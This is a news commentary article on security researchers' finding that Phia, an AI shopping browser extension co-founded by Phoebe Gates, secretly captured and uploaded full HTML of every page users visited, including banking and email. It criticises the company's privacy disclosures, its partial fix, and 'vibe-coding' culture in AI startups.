According to Fortune, Phia—the AI shopping startup co-founded by Phoebe Gates and backed by an $8 million Kleiner Perkins-led seed round with investors including Hailey Bieber and Sheryl Sandberg—has been collecting far more user data than disclosed. Security researchers found the browser extension was capturing complete webpage HTML from every site users visited, including bank statements and private emails, even when not interacting with shopping sites. The feature, called “logCompleteHTMLtoGCS,” compressed and transmitted full page copies to Phia’s servers without users’ knowledge. After researcher Maahir Sharma alerted the company last week, Phia removed the HTML collection feature but didn’t disclose the privacy violation to users. The New York-based startup, launched in April and named one of TIME’s Best Inventions of 2025, had reached hundreds of thousands of users before the issue was discovered.
What they were really collecting
Here’s the thing that really alarms me about this situation. We’re not talking about some basic tracking cookies here. The extension was literally taking snapshots of every single webpage you loaded—your banking dashboard, your private emails, your medical portals—and shipping them off to Phia’s servers. Researcher Charlie Eriksen called it “one of the crazier things” he’s seen in his career, and honestly, that might be an understatement.
Think about what that means in practice. That “logCompleteHTMLtoGCS” function buried in the code was essentially creating a perfect replica of your digital life. Your Revolut transactions? Logged. Your Gmail conversations? Logged. Anything you viewed while that extension was active became Phia’s property. And the company’s response that this was for “identifying new retail websites” feels incredibly weak when you consider the sheer volume and sensitivity of what they were taking.
The privacy policy problem
Now let’s talk about the disconnect between what Phia was doing and what they were telling users. Their privacy policy specifically states they “generally exclude personally identifiable information” and collect data only from “retail sites.” But researchers found they were collecting from everywhere. The Chrome Store disclosure claimed user data wasn’t “used or transferred for purposes unrelated to the item’s core functionality.” So why were they archiving people’s banking pages?
This isn’t just bad optics—it’s potentially illegal. Experts told Fortune this likely violates GDPR principles of data minimization and transparency, plus various U.S. state privacy laws. When you look at the Chrome extension privacy details, there’s no mention of this wholesale HTML collection. That’s a pretty massive omission.
Even the fix is problematic
So Phia removed the HTML collection feature. Great. But they’re still collecting URLs, which can contain plenty of sensitive information itself. Search terms, customer IDs, national identification numbers—if it’s in the URL, Phia gets it. And since users log in with their real email accounts, the company can still reconstruct your entire browsing history and tie it directly to your identity.
Researchers also found some bizarre inconsistencies in their “whitelisting” approach. They don’t collect Google search data but do collect Bing searches. Why the difference? And what other arbitrary rules are governing what gets captured? It feels like they’re playing privacy whack-a-mole rather than implementing a coherent data protection strategy.
The bigger AI startup problem
Maahir Sharma nailed it when he described the “vibe-coding” culture in AI startups today. These companies are moving at breakneck speed—ten times faster than traditional development cycles—and privacy often becomes an afterthought. When you’re racing to secure the next funding round and chasing buzzworthy features, proper security practices get left behind.
And let’s be real—when you’ve got Kleiner Perkins writing checks and celebrities endorsing your product, there’s immense pressure to grow fast and demonstrate value. But that doesn’t excuse building surveillance tools disguised as shopping assistants. The fact that multiple independent researchers had to discover this, and that Phia only acted when confronted, speaks volumes about the current state of AI ethics.
Basically, we’ve reached a point where we need to ask: are these AI tools actually serving users, or are users serving as training data for AI tools? Because when a shopping extension knows more about your banking habits than your shopping preferences, something has gone seriously wrong.
